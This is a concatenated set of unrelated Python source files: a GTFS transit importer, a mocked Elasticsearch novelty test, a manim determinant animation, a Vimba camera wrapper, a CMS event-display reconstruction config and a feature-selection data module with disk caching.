return Point(row['stop_lon'], row['stop_lat'])
def linestring_geometry(dataframe, point_dict, from_point, to_point):
df = dataframe.copy()
def geometry(row):
return LineString(
(point_dict[row[from_point]], point_dict[row[to_point]]))
return df.apply(geometry, axis=1)
class BaseGtfsImporter():
"""
importer = BaseGtfsImporter(gtfs_path)
importer.read()
importer.build()
sm = stepmodel.StepModel()
sm.links = importer.links
sm.nodes = importer.stops
"""
def __init__(self, gtfs_path):
self.gtfs_path = gtfs_path
def read(self, encoding=None):
self.stop_times = pd.read_csv(
self.gtfs_path + 'stop_times.txt',
encoding=encoding,
)
self.trips = pd.read_csv(
self.gtfs_path + 'trips.txt',
encoding=encoding,
low_memory=False # mixed types
)
self.routes = pd.read_csv(
self.gtfs_path + 'routes.txt',
encoding=encoding
)
self.stops = pd.read_csv(self.gtfs_path + 'stops.txt', encoding=encoding)
def pick_trips(self):
# one trip by direction
self.trips = pd.merge(self.trips, self.routes[['route_id']])
self.trips = self.trips.groupby(
['route_id', 'direction_id'],
as_index=False
).first()
self.stop_times = pd.merge(self.stop_times, self.trips[['trip_id']])
stop_id_set = set(self.stop_times['stop_id'])
self.stops = self.stops.loc[self.stops['stop_id'].isin(stop_id_set)]
def to_seconds(self):
time_columns = ['arrival_time', 'departure_time']
self.stop_times[time_columns] = self.stop_times[
time_columns].applymap(to_seconds)
def build_links(self):
links = feed_links.link_from_stop_times(
self.stop_times,
max_shortcut=1,
stop_id='stop_id',
keep_origin_columns=['departure_time'],
keep_destination_columns=['arrival_time'],
stop_id_origin='origin',
stop_id_destination='destination',
out_sequence='link_sequence'
).reset_index()
links['time'] = links['arrival_time'] - links['departure_time']
links.rename(
columns={
'origin': 'a',
'destination': 'b',
},
inplace=True
)
self.links = links
def merge_tables(self):
# merge
self.trips = pd.merge(self.trips, self.routes, on='route_id')
# [['trip_id', 'route_id', 'direction_id']]
self.links = pd.merge(self.links, self.trips, on='trip_id')
def build_geometries(self):
self.stops['geometry'] = self.stops.apply(point_geometry, axis=1)
self.links['geometry'] = linestring_geometry(
self.links,
self.stops.set_index('stop_id')['geometry'].to_dict(),
'a',
'b'
)
def cast_columns_to_string(
self,
columns=['trip_id', 'route_id', 'stop_id']
):
for key, attr in self.__dict__.items():
try:
cols = []
for c in attr.columns:
if c in columns:
cols.append(c)
attr[c] = attr[c].astype(str)
print(key, cols, 'converted to string')
except AttributeError: # 'str' object has no attribute 'columns'
pass
def build(self):
self.pick_trips()
self.to_seconds()
self.build_links()
self.merge_tables()
self.build_geometries()
|
1697738
|
import pytest
from unittest import mock
from nesta.packages.novelty.lolvelty import lolvelty
def test_lolvelty():
es = mock.MagicMock()
es.count.return_value = {'count': 100}
# Very novel
es.search.return_value = {'hits': {'hits':[{'_score':100},
{'_score':5},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 100}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score > 200
# Not novel at all
es.search.return_value = {'hits': {'hits':[{'_score':1},
{'_score':1},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 1}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score < 0
# Somewhat novel
es.search.return_value = {'hits': {'hits':[{'_score':10},
{'_score':10},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 10}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score > 0 and score < 200
|
1697752
|
from pathlib import Path
from manim import *
class Determinant(Scene):
def construct(self):
text_color = "#333"
vect1_color = "#b98b99"
vect2_color = "#b9b28b"
numberplane = NumberPlane(
background_line_style={
"stroke_opacity": 0.4
}
)
determinant = MathTex(
"\\det\\left( \\begin{bmatrix}a && b \\\\ c && d \\end{bmatrix}\\right) = ad - bc", font_size=105
).set_color(text_color)
determinant[0][5].set_color(vect1_color)
determinant[0][6].set_color(vect2_color)
determinant[0][7].set_color(vect1_color)
determinant[0][8].set_color(vect2_color)
determinant[0][12].set_color(vect1_color)
determinant[0][13].set_color(vect2_color)
determinant[0][15].set_color(vect2_color)
determinant[0][16].set_color(vect1_color)
determinant.move_to(ORIGIN + UP * 2.25)
origin = np.array([-6, -3, 0])
vect_1 = np.array([12, 0, 0])
vect_2 = np.array([0, 3, 0])
grid_1 = vect_1 + vect_2
grid_2 = vect_2 + vect_1
vect1 = Line(start=origin, end=origin + vect_1, stroke_color=vect1_color, stroke_width=10).add_tip()
dashed_line1 = DashedLine(start=origin + vect_1, end=origin + grid_1, stroke_color="#ccc", stroke_width=10)
vect2 = Line(start=origin, end=origin + vect_2, stroke_color=vect2_color, stroke_width=10).add_tip()
dashed_line2 = DashedLine(start=origin + vect_2, end=origin + grid_2, stroke_color="#ccc", stroke_width=10)
center_point = origin + ((vect_1 + vect_2) * 0.5)
area_text = MathTex("ad - bc", font_size=150).set_color("#333").move_to(center_point)
area_text[0][0].set_color(vect1_color)
area_text[0][1].set_color(vect2_color)
area_text[0][3].set_color(vect2_color)
area_text[0][4].set_color(vect1_color)
rectangle = Rectangle(width=vect_1[0], height=vect_2[1], color="#ccc").move_to(center_point)
self.add(numberplane, rectangle, determinant, vect1, vect2, dashed_line1, dashed_line2, area_text)
if __name__ == '__main__':
config.background_color = WHITE
config.format = 'gif'
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/determinant')
config.pixel_width = 400
config.pixel_height = 225
scene = Determinant()
scene.render()
|
1697762
|
from ctypes import byref, sizeof, c_uint32
from typing import Optional, List, Callable
import gc
from .vimba_object import VimbaObject
from .vimba_exception import VimbaException
from .frame import Frame
from . import vimba_c
SINGLE_FRAME = 'SingleFrame'
CONTINUOUS = 'Continuous'
def _camera_infos() -> List[vimba_c.VmbCameraInfo]:
"""
Gets camera info of all attached cameras.
"""
# call once just to get the number of cameras
vmb_camera_info = vimba_c.VmbCameraInfo()
num_found = c_uint32(-1)
error = vimba_c.vmb_cameras_list(byref(vmb_camera_info),
0,
byref(num_found),
sizeof(vmb_camera_info))
if error and error != VimbaException.ERR_DATA_TOO_LARGE:
raise VimbaException(error)
# call again to get the features
num_cameras = num_found.value
vmb_camera_infos = (vimba_c.VmbCameraInfo * num_cameras)()
error = vimba_c.vmb_cameras_list(vmb_camera_infos,
num_cameras,
byref(num_found),
sizeof(vmb_camera_info))
if error:
raise VimbaException(error)
return list(vmb_camera_info for vmb_camera_info in vmb_camera_infos)
def _camera_info(id_string: str) -> vimba_c.VmbCameraInfo:
"""
Gets camera info object of specified camera.
:param id_string: the ID of the camera object to get. This can be an ID or e.g. a serial number.
Check the Vimba documentation for other possible values.
"""
vmb_camera_info = vimba_c.VmbCameraInfo()
error = vimba_c.vmb_camera_info_query(id_string.encode(),
vmb_camera_info,
sizeof(vmb_camera_info))
if error:
raise VimbaException(error)
return vmb_camera_info
def camera_ids():
"""
Gets IDs of all available cameras.
"""
return list(vmb_camera_info.cameraIdString.decode()
for vmb_camera_info in _camera_infos())
class Camera(VimbaObject):
"""
A Vimba camera object.
"""
def __init__(self, vimba, camera_id: str):
self._camera_id = camera_id
super().__init__(vimba)
# remember state
self._is_armed = False
self._is_acquiring = False
self._acquisition_mode = ''
self._frame_buffer = ()
# user registered callback function
self._user_callback = None
@property
def handle(self):
return self._handle
@property
def camera_id(self) -> str:
return self._camera_id
@property
def info(self) -> vimba_c.VmbCameraInfo:
"""
Get info of the camera. Does not require the camera to be opened.
"""
return _camera_info(self.camera_id)
def open(self,
camera_access_mode: Optional[int] = VimbaObject.VMB_ACCESS_MODE_FULL,
adjust_packet_size: Optional[bool] = True):
"""
Open the camera with requested access mode. Adjusts packet size by default.
:param camera_access_mode: Access mode to open the camera in.
:param adjust_packet_size: Adjust packet size for GigE cameras.
"""
error = vimba_c.vmb_camera_open(self.camera_id.encode(),
camera_access_mode,
byref(self._handle))
if error:
raise VimbaException(error)
# may experience issues with ethernet commands if not called
if adjust_packet_size:
try:
self.GVSPAdjustPacketSize()
# ignore error on non-GigE cameras
except AttributeError:
pass
def close(self):
"""
Close the camera.
"""
self.unregister_all_feature_invalidation_callbacks()
error = vimba_c.vmb_camera_close(self._handle)
if error:
raise VimbaException(error)
def revoke_all_frames(self):
"""
Revoke all frames assigned to the camera.
"""
error = vimba_c.vmb_frame_revoke_all(self._handle)
if error:
raise VimbaException(error)
def start_capture(self):
"""
Prepare the API for incoming frames.
"""
error = vimba_c.vmb_capture_start(self._handle)
if error:
raise VimbaException(error)
def end_capture(self):
"""
Stop the API from being able to receive frames.
"""
error = vimba_c.vmb_capture_end(self._handle)
if error:
raise VimbaException(error)
def flush_capture_queue(self):
"""
Flush the capture queue.
"""
error = vimba_c.vmb_capture_queue_flush(self._handle)
if error:
raise VimbaException(error)
def new_frame(self) -> Frame:
"""
        Creates and returns a new frame object. Call repeatedly to create multiple frames
        per camera.
"""
return Frame(self)
def arm(self, mode: str, callback: Optional[Callable] = None,
frame_buffer_size: Optional[int] = 10) -> None:
"""
Arm the camera by starting the capture engine and creating frames.
:param mode: Either 'SingleFrame' to acquire a single frame or 'Continuous' for streaming
frames.
        :param callback: A function reference to call when each frame is ready. Applies to
        'Continuous' acquisition mode only. The callback should execute relatively quickly to
        avoid dropping frames: if the camera captures a frame while no frame is queued for
        capture, that frame is dropped. The callback should therefore run (on average) at least
        as fast as the camera frame rate. It may be desirable for the callback to copy the
        frame data and pass it to a separate thread/process for processing.
:param frame_buffer_size: number of frames to create and use for the acquisition buffer.
Applies to 'Continuous' acquisition mode only. Increasing this may help if frames are being
dropped.
"""
if self._is_armed:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
if mode not in (SINGLE_FRAME, CONTINUOUS):
raise ValueError('unknown mode')
if mode == SINGLE_FRAME:
frame_buffer_size = 1
# set and remember mode
self.AcquisitionMode = mode
self._acquisition_mode = mode
# create frame buffer and announce frames to camera
self._frame_buffer = tuple(self.new_frame()
for _ in range(frame_buffer_size))
for frame in self._frame_buffer:
frame.announce()
self.start_capture()
# setup frame ready callbacks
if mode == CONTINUOUS:
if callback is None:
def callback(frame: Frame) -> None:
pass
self._user_callback = callback
for frame in self._frame_buffer:
frame.queue_for_capture(self._streaming_callback)
self._is_armed = True
def acquire_frame(self, timeout_ms: Optional[int] = 2000) -> Frame:
"""
        Acquire and return a single frame when the camera is armed in 'SingleFrame' acquisition
        mode. Can be called multiple times in a row, but don't call again until the frame has
        been copied or processed, because the internal frame object is reused.
"""
if not self._is_armed or self._acquisition_mode != SINGLE_FRAME:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
# capture a single frame
self._frame_buffer[0].queue_for_capture()
self.AcquisitionStart()
self._frame_buffer[0].wait_for_capture(timeout_ms)
self.AcquisitionStop()
return self._frame_buffer[0]
def start_frame_acquisition(self) -> None:
"""
Acquire and stream frames (to the specified callback function) indefinitely when the camera
is armed in 'Continuous' acquisition mode.
"""
# no need to check self._is_acquiring
if not self._is_armed or self._acquisition_mode != CONTINUOUS:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
# safe to call multiple times
self.AcquisitionStart()
self._is_acquiring = True
def _streaming_callback(self, frame: Frame) -> None:
"""
Called upon the frame ready event. Wraps the user's callback and requeues the frame.
"""
self._user_callback(frame)
# streaming may have stopped by now, especially if callback is long running
if self._is_armed and self._acquisition_mode == CONTINUOUS:
frame.queue_for_capture(self._streaming_callback)
def stop_frame_acquisition(self) -> None:
"""
Stop acquiring and streaming frames.
"""
# implies both is armed and in continuous mode
if self._is_acquiring:
self._is_acquiring = False
self.AcquisitionStop()
def disarm(self) -> None:
"""
Disarm the camera by stopping the capture engine and cleaning up frames.
"""
# among other things this prevents callback from requeuing frames
self._is_armed = False
# automatically stop acquisition if required
self.stop_frame_acquisition()
# clean up
self.end_capture()
self.flush_capture_queue()
self.revoke_all_frames()
self._frame_buffer = ()
# encourage garbage collection of frame buffer memory
gc.collect()
def load_settings(self, filepath, iterations) -> None:
"""
Load settings from XML
"""
vmb_persist_settings = vimba_c.VimbaFeaturePersistSettings()
vmb_persist_settings.persistType = 2 # all apart from LUT, default option
vmb_persist_settings.maxIterations = iterations
error = vimba_c.vmb_camera_settings_load(self._handle,
filepath.encode(),
byref(vmb_persist_settings),
sizeof(vmb_persist_settings))
if error:
raise VimbaException(error)
def save_settings(self, filepath, iterations) -> None:
"""
Save settings to XML
"""
vmb_persist_settings = vimba_c.VimbaFeaturePersistSettings()
vmb_persist_settings.persistType = 2 # all apart from LUT, default option
vmb_persist_settings.maxIterations = iterations
error = vimba_c.vmb_camera_settings_save(self._handle,
filepath.encode(),
byref(vmb_persist_settings),
sizeof(vmb_persist_settings))
if error:
raise VimbaException(error)
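# --- Hedged usage sketch (not executed on import) ----------------------------
# Assumes this module ships inside a pymba-style package whose `Vimba` context
# manager hands out Camera instances; the Frame method/attribute names below
# are assumptions drawn from pymba's documented examples.
def _example_capture():
    import time
    from pymba import Vimba  # assumption: enclosing package entry point

    def on_frame(frame: Frame) -> None:
        # runs on the frame-ready thread; keep it fast (see arm() docstring)
        print('received frame', frame.data.frameID)

    with Vimba() as vimba:
        camera = vimba.camera(0)
        camera.open()
        # single-frame acquisition
        camera.arm(SINGLE_FRAME)
        camera.acquire_frame()
        camera.disarm()
        # continuous streaming through a callback
        camera.arm(CONTINUOUS, on_frame)
        camera.start_frame_acquisition()
        time.sleep(1)
        camera.stop_frame_acquisition()
        camera.disarm()
        camera.close()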
|
1697801
|
import FWCore.ParameterSet.Config as cms
process = cms.Process('RERECO')
# this is to avoid the postpathendrun problem with same process name (only with http reader)
process.options = cms.untracked.PSet(
IgnoreCompletely = cms.untracked.vstring('Configuration')
# SkipEvent = cms.untracked.vstring('Configuration')
)
# for ispy
process.add_(
cms.Service("ISpyService",
outputFileName = cms.untracked.string('Ispy.ig'),
outputMaxEvents = cms.untracked.int32 (1000),
online = cms.untracked.bool(True),
debug = cms.untracked.bool(True)
)
)
# import of standard configurations
process.load('Configuration/StandardSequences/Services_cff')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.load('Configuration/StandardSequences/GeometryIdeal_cff')
process.load('Configuration/StandardSequences/MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration/StandardSequences/RawToDigi_Data_cff')
process.load('Configuration/StandardSequences/Reconstruction_cff')
process.load('DQMOffline/Configuration/DQMOffline_cff')
process.load('Configuration/StandardSequences/EndOfProcess_cff')
process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')
process.load('Configuration/EventContent/EventContent_cff')
process.load('ISpy/Analyzers/ISpy_Producer_cff')
######### FILTERING Section #############################
# this is for filtering on HLT path
process.hltHighLevel = cms.EDFilter("HLTHighLevel",
TriggerResultsTag = cms.InputTag("TriggerResults","","HLT"),
# HLTPaths = cms.vstring('HLT_Activity_L1A'), # provide list of HLT paths (or patterns) you want
HLTPaths = cms.vstring('HLT_MinBiasBSC'), # provide list of HLT paths (or patterns) you want
eventSetupPathsKey = cms.string(''), # not empty => use read paths from AlCaRecoTriggerBitsRcd via this key
andOr = cms.bool(True), # how to deal with multiple triggers: True (OR) accept if ANY is true, False (AND) accept if ALL are true
throw = cms.bool(True), # throw exception on unknown path names
saveTags = cms.bool(False)
)
# this is for filtering based on reco variables
process.skimming = cms.EDFilter("BeamSplash",
energycuttot = cms.untracked.double(1000.0),
energycutecal = cms.untracked.double(700.0),
energycuthcal = cms.untracked.double(700.0),
ebrechitcollection = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
eerechitcollection = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
hbherechitcollection = cms.InputTag("hbhereco"),
applyfilter = cms.untracked.bool(False)
)
# this is for filtering on trigger type
process.load("HLTrigger.special.HLTTriggerTypeFilter_cfi")
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter.SelectedTriggerType = 1
# this is for filtering on L1 technical trigger bit
process.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')
process.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')
process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('32 OR 33 OR 40 OR 41')
#this is for filtering/tagging PhysDecl bit
process.physdecl = cms.EDFilter("PhysDecl",
applyfilter = cms.untracked.bool(False),
debugOn = cms.untracked.bool(True)
)
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.2 $'),
annotation = cms.untracked.string('promptReco nevts:1'),
name = cms.untracked.string('PyReleaseValidation')
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(NUMEVENTS)
)
# NOTE: this second assignment replaces the process.options PSet defined near the top of the file
process.options = cms.untracked.PSet(
Rethrow = cms.untracked.vstring('ProductNotFound'),
wantSummary = cms.untracked.bool(True)
)
process.source = cms.Source("EventStreamHttpReader",
# streaming##################################################
# in p5
# sourceURL = cms.string('http://srv-c2d05-14.cms:22100/urn:xdaq-application:lid=30'),
# consumerName = cms.untracked.string('DQM Source'),
# tunnel to proxy
# THIS SHOULD BE THE CORRECT FOR OFFLINE ACCESSING THE REVERSE PROXY
# sourceURL = cms.string('http://cmsdaq0.cern.ch/event-server/urn:xdaq-application:lid=30'),
# special tunnel configuration, need to setup an external tunnel
# sourceURL = cms.string('http://localhost:22100/urn:xdaq-application:lid=30'),
sourceURL = SOURCE,
consumerName = cms.untracked.string('Event Display'),
# direct storage manager
# sourceURL = cms.string('http://localhost:22100/urn:xdaq-application:service=storagemanager'),
# consumerName = cms.untracked.string('Event Display'),
# playback###################################################
# in pt5
# sourceURL = cms.string('http://srv-c2d05-05:50082/urn:xdaq-application:lid=29'),
# tunnel
# sourceURL = cms.string('http://localhost:50082/urn:xdaq-application:lid=29'),
# consumerName = cms.untracked.string('Playback Source'),
#################################################################
consumerPriority = cms.untracked.string('normal'),
max_event_size = cms.int32(7000000),
SelectHLTOutput = SELECTHLT,
# SelectHLTOutput = cms.untracked.string('hltOutputDQM'),
# SelectHLTOutput = cms.untracked.string('hltOutputExpress'),
max_queue_depth = cms.int32(5),
maxEventRequestRate = cms.untracked.double(2.0),
SelectEvents = cms.untracked.PSet(
# SelectEvents = cms.vstring('*DQM')
SelectEvents = cms.vstring('*')
# SelectEvents = cms.vstring('PhysicsPath')
),
headerRetryInterval = cms.untracked.int32(3)
)
#process.source = cms.Source("PoolSource",
# debugVerbosity = cms.untracked.uint32(0),
# debugFlag = cms.untracked.bool(False),
# fileNames = cms.untracked.vstring(
##'/store/data/Commissioning08/BeamHalo/RECO/StuffAlmostToP5_v1/000/061/642/10A0FE34-A67D-DD11-AD05-000423D94E1C.root'
##
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FED0EFCD-AB87-DE11-9B72-000423D99658.root'
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC629BD2-CF87-DE11-9077-001D09F25438.root',
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC38EE75-BD87-DE11-822A-001D09F253C0.root',
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC1CB101-A487-DE11-9F10-000423D99660.root'
#))
process.FEVT = cms.OutputModule("PoolOutputModule",
maxSize = cms.untracked.int32(1000),
fileName = cms.untracked.string('EVDISPSM_DIR/EVDISPSM_SUFFIX.root'),
outputCommands = cms.untracked.vstring('keep *','drop *_MEtoEDMConverter_*_*'),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RAW-RECO'),
# filterName = cms.untracked.string(''))
filterName = cms.untracked.string('EVDISP')),
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('fullpath')
)
)
# Other statements
#process.GlobalTag.connect = 'sqlite_file:/afs/cern.ch/user/m/malgeri/public/gtfirstcoll.db'
process.GlobalTag.globaltag = 'GR10_P_V2::All'
process.fifthCkfTrajectoryFilter.filterPset.minimumNumberOfHits = 2
process.fifthCkfTrajectoryFilter.filterPset.maxLostHits = 4
process.fifthCkfTrajectoryFilter.filterPset.maxConsecLostHits = 2
process.fifthCkfInOutTrajectoryFilter.filterPset.minimumNumberOfHits = 2
process.fifthCkfInOutTrajectoryFilter.filterPset.maxLostHits = 4
process.fifthCkfInOutTrajectoryFilter.filterPset.maxConsecLostHits = 2
process.fifthCkfTrajectoryBuilder.minNrOfHitsForRebuild = 2
process.fifthRKTrajectorySmoother.minHits = 2
process.fifthRKTrajectoryFitter.minHits = 2
process.fifthFittingSmootherWithOutlierRejection.MinNumberOfHits = 2
process.tobtecStepLoose.minNumberLayers = 2
process.tobtecStepLoose.maxNumberLostLayers = 2
process.tobtecStepLoose.dz_par1 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.dz_par2 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.d0_par1 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.d0_par2 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.chi2n_par = cms.double(100.0)
process.fifthSeeds.RegionFactoryPSet.RegionPSet.originHalfLength = 100
process.fifthSeeds.RegionFactoryPSet.RegionPSet.originRadius = 10
process.Chi2MeasurementEstimator.MaxChi2 = 100
# to filter on MinBias...
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.hltHighLevel+process.RawToDigi+process.reconstruction)
# to filter on trigger type only
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.hltHighLevel+process.RawToDigi+process.reconstruction)
#process.fullpath = cms.Path(process.RawToDigi+process.reconstruction+process.skimming+process.iSpy_sequence)
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.RawToDigi+process.reconstruction+process.skimming+process.iSpy_sequence)
# added physdecl in tagging mode to catch physdeclared bit in log files
# process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.RawToDigi+process.physdecl+process.reconstruction+process.skimming+process.iSpy_sequence)
process.fullpath = cms.Path(process.RawToDigi+process.physdecl+process.reconstruction+process.skimming+process.iSpy_sequence)
process.out_step = cms.EndPath(process.FEVT)
# Schedule definition
process.schedule = cms.Schedule(process.fullpath,process.out_step)
#process.e = cms.EndPath(process.out)
|
1697809
|
from typing import Dict, List, Tuple, Union, Any, TypeVar
from scipy.sparse.csr import csr_matrix
from numpy import memmap
from sqlitedict import SqliteDict
from tempfile import mkdtemp
from DocumentFeatureSelection.init_logger import logger
from numpy import ndarray, int32, int64
import pickle
import json
import csv
import os
import shutil
# this class is from https://code.activestate.com/recipes/576642/
class PersistentDict(dict):
''' Persistent dictionary with an API compatible with shelve and anydbm.
The dict is kept in memory, so the dictionary operations run as fast as
a regular dictionary.
Write to disk is delayed until close or sync (similar to gdbm's fast mode).
Input file format is automatically discovered.
Output file format is selectable between pickle, json, and csv.
All three serialization formats are backed by fast C implementations.
'''
def __init__(self, filename, flag='c', mode=None, format='pickle', *args, **kwds):
self.flag = flag # r=readonly, c=create, or n=new
self.mode = mode # None or an octal triple like 0644
self.format = format # 'csv', 'json', or 'pickle'
self.filename = filename
if flag != 'n' and os.access(filename, os.R_OK):
fileobj = open(filename, 'rb' if format=='pickle' else 'r')
with fileobj:
self.load(fileobj)
dict.__init__(self, *args, **kwds)
def sync(self):
'Write dict to disk'
if self.flag == 'r':
return
filename = self.filename
tempname = filename + '.tmp'
fileobj = open(tempname, 'wb' if self.format=='pickle' else 'w')
try:
self.dump(fileobj)
except Exception:
os.remove(tempname)
raise
finally:
fileobj.close()
shutil.move(tempname, self.filename) # atomic commit
if self.mode is not None:
os.chmod(self.filename, self.mode)
def close(self):
self.sync()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def dump(self, fileobj):
if self.format == 'csv':
csv.writer(fileobj).writerows(self.items())
elif self.format == 'json':
json.dump(self, fileobj, separators=(',', ':'))
elif self.format == 'pickle':
pickle.dump(dict(self), fileobj, 2)
else:
raise NotImplementedError('Unknown format: ' + repr(self.format))
def load(self, fileobj):
# try formats from most restrictive to least restrictive
for loader in (pickle.load, json.load, csv.reader):
fileobj.seek(0)
try:
return self.update(loader(fileobj))
except Exception:
pass
raise ValueError('File not in a supported format')
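# Hedged usage sketch for PersistentDict (the path below is illustrative):
def _example_persistent_dict(path='/tmp/label2id.cache'):
    """Create a JSON-backed dict, write two entries, and flush to disk."""
    with PersistentDict(path, flag='c', format='json') as d:
        d['label_a'] = 0
        d['label_b'] = 1
        d.sync()  # explicit flush; close()/__exit__ also sync
    return path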
class SetDocumentInformation(object):
__slots__ = ['matrix_object', 'label2id', 'feature2id']
def __init__(self, dict_matrix_index:Union[Dict[str,Any], SqliteDict, PersistentDict]):
"""
* Keys
- matrix_object:Union[csr_matrix, ndarray]
- label2id: Dict[str, str]
- feature2id: Dict[str, str]
"""
if not "matrix_object" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='matrix_object'")
if not "label2id" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='label2id'")
if not "feature2id" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='feature2id'")
self.matrix_object = dict_matrix_index['matrix_object']
self.label2id = dict_matrix_index['label2id']
self.feature2id = dict_matrix_index['feature2id']
if isinstance(dict_matrix_index, dict):
pass
elif isinstance(dict_matrix_index, PersistentDict):
dict_matrix_index.sync()
elif isinstance(dict_matrix_index, SqliteDict):
dict_matrix_index.sync()
else:
            raise Exception('dict_matrix_index must be a dict, PersistentDict, or SqliteDict')
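# Hedged sketch of the minimal mapping SetDocumentInformation expects
# (toy placeholder values):
def _example_set_document_information():
    info = SetDocumentInformation({
        'matrix_object': csr_matrix((3, 3)),
        'label2id': {'label_a': 0, 'label_b': 1, 'label_c': 2},
        'feature2id': {'word_x': 0, 'word_y': 1, 'word_z': 2},
    })
    return info.matrix_object.shape  # (3, 3)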
class DataCsrMatrix(object):
"""* What you can do
- You can keep information for keeping matrix object.
"""
__slots__ = ['cache_backend', 'csr_matrix_',
'label2id_dict', 'vocabulary',
'n_docs_distribution', 'n_term_freq_distribution', 'path_working_dir']
def __init__(self,
csr_matrix_: csr_matrix,
label2id_dict: Dict[str, int],
vocabulary: Dict[str, int],
n_docs_distribution: ndarray,
n_term_freq_distribution: ndarray,
is_use_cache: bool=False,
is_use_memmap: bool=False,
cache_backend: str='PersistentDict',
path_working_dir: str=None):
"""* Parameters
-----------------
- csr_matrix_: Matrix object which saves term frequency or document frequency
- label2id_dict: Dict object whose key is label-name, value is row-index of the given matrix.
>>> {'label_b': 0, 'label_c': 1, 'label_a': 2}
- vocabulary: Dict object whose key is feature-name, value is column-index of the given matrix.
>>> {'label_b': 0, 'label_c': 1, 'label_a': 2}
- n_docs_distribution: Sequence object(list,ndarray). It saves a distribution of N(docs) in each label.
- n_term_freq_distribution: Sequence object(list,ndarray). It saves a distribution of N(all terms) in each label.
- is_use_cache: boolean. It True; the matrix object is saved on the disk. It saves memory of your machine.
- is_use_memmap: boolean. It True; the matrix object is saved on the disk. It saves memory of your machine.
- cache_backend: str. {PersistentDict, SqliteDict}, backend to save this object on the disk.
- path_working_dir: str. Path to save temporary cache objects.
"""
self.n_docs_distribution = n_docs_distribution
self.n_term_freq_distribution = n_term_freq_distribution
self.cache_backend = cache_backend
if (is_use_memmap or is_use_cache) and path_working_dir is None:
self.path_working_dir = mkdtemp()
logger.info("Temporary files are at {}".format(self.path_working_dir))
else:
self.path_working_dir = path_working_dir
if is_use_cache:
"""You use disk-drive for keeping object.
"""
            path_vocabulary_cache_obj = os.path.join(self.path_working_dir, 'vocabulary.cache')
            path_label_2_dict_cache_obj = os.path.join(self.path_working_dir, 'label_2_dict.cache')
            self.vocabulary = self.initialize_cache_dict_object(path_vocabulary_cache_obj)
            self.label2id_dict = self.initialize_cache_dict_object(path_label_2_dict_cache_obj)
            logger.info("Now saving into local file...")
            # copy both mappings into the on-disk backend; plain assignment would
            # silently replace the cache object with the in-memory dict
            for k, v in vocabulary.items():
                self.vocabulary[k] = v
            for k, v in label2id_dict.items():
                self.label2id_dict[k] = v
            if isinstance(self.vocabulary, PersistentDict):
                self.vocabulary.sync()
            if isinstance(self.label2id_dict, PersistentDict):
                self.label2id_dict.sync()
else:
"""Keep everything on memory
"""
self.label2id_dict = label2id_dict
self.vocabulary = vocabulary
if is_use_memmap:
"""You use disk-drive for keeping object
"""
path_memmap_obj = os.path.join(self.path_working_dir, 'matrix.memmap')
self.csr_matrix_ = self.initialize_memmap_object(csr_matrix_, path_memmap_object=path_memmap_obj)
else:
self.csr_matrix_ = csr_matrix_
def initialize_cache_dict_object(self, path_cache_file):
if self.cache_backend == 'PersistentDict':
return PersistentDict(path_cache_file, flag='c', format='json')
elif self.cache_backend == 'SqliteDict':
return SqliteDict(path_cache_file, autocommit=True)
else:
raise Exception('No such cache_backend option named {}'.format(self.cache_backend))
def initialize_memmap_object(self, matrix_object: csr_matrix, path_memmap_object: str)->memmap:
fp = memmap(path_memmap_object, dtype='float64', mode='w+', shape=matrix_object.shape)
fp[:] = matrix_object.todense()[:]
return fp
def __str__(self):
return """matrix-type={}, matrix-size={}, path_working_dir={}""".format(type(self.csr_matrix_),
self.csr_matrix_.shape,
self.path_working_dir)
class ROW_COL_VAL(object):
"""Data class to keep value of one item in CSR-matrix"""
__slots__ = ('row', 'col', 'val')
def __init__(self, row: int, col:int, val:int):
self.row = row
self.col = col
self.val = val
class ScoredResultObject(object):
""""""
def __init__(self,
scored_matrix:csr_matrix,
label2id_dict:Union[Dict[str,Any], ndarray],
                 feature2id_dict: Union[Dict[str, Any], ndarray],
method:str=None,
matrix_form:str=None,
frequency_matrix:csr_matrix=None):
"""*Parameters
------------
- scored_matrix: Matrix object which saves result of feature-extraction
- label2id_dict: Dict object whose key is label-name, value is row-index of the matrix.
- feature2id_dict: Dict object whose key is feature-name, value is column-index of the matrix.
- method: a name of feature-extraction method.
